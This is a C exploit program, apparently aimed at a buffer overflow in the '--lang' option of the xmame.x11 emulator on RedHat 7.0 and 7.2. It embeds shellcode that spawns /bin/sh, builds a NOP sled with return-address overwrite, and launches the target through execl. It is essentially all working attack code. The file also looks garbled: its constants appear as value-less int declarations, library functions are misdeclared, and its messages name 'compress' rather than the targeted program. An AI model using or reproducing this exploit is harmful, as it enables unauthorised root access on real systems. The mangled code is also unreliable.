
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 char NOP ;
 int OFFSET ;
 int RET_70 ;
 int RET_72 ;
 int atoi (char*) ;
 int execl (char*,char*,char*,char*,int *) ;
 int fprintf (int ,char*,...) ;
 int memcpy (char*,unsigned char*,int ) ;
 int printf (char*) ;
 int stderr ;
 int strlen (unsigned char*) ;

int
main(int argc, char *argv[])
{
int i=0; char buf[OFFSET];
int c, ret;

unsigned char shellcode1[] =
"\x33\xDB\x33\xC0\xB0\x1B\xCD\x80"
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80"
"\x31\xc0\x50\x50\xb0\xb5\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";


 if(argc != 2) {
  fprintf(stderr,"usage: %s <os_type> \n",argv[0]);
  fprintf(stderr,"types:\n RedHat 7.0 - [1]");
  fprintf(stderr,"\n RedHat 7.2 - [2]\n\n");
  return 1;
 }

 c=atoi(argv[1]);

 switch(c) {
  case 1:
   printf("Exploiting compress for RedHat 7.0\n");
   ret = RET_70 - OFFSET;
   break;
  case 2:
   printf("Exploiting compress for RedHat 7.2\n");
   ret = RET_72 - OFFSET;
   break;
 }

 for(i=0;i<=OFFSET-1 ;i++)
  buf[i]=NOP;
 for(i=OFFSET-301;i<=OFFSET-1 ;i+=4)
 *(int *) &buf[i++] = ret;
 memcpy(buf+200,shellcode1,strlen(shellcode1));
 execl("/usr/local/bin/xmame.x11", "/usr/local/bin/xmame.x11","--lang", buf, ((void*)0));

return 0;
}
